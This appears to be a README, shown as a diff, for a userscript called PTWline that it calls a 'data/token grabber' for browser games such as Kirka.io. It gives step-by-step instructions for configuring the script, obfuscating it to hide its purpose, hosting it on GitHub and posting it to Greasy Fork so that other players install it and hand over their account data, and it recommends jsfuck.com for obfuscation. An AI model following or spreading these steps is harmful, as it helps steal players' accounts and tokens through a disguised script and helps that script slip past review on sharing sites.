petiuka/PTWline/README.md

 Data/token grabber for browser games on js for tampermonkey

+#How to use
+1.Download src of PTWline
+2.Configure build in first variables of script 3.Obfuscate your build
+4.(Method to post script on greasefork) Upload script to github, make raw txt file and copy link to use loadmethod from this repo and after this post that on greasefork
+5.Now to get accounts data you need someone with the included script to log into your account (in Kirka.io only goto website with script)
 ### Recommended to obfuscate your PTWline build
 Websites to obfuscate:
 - http://www.jsfuck.com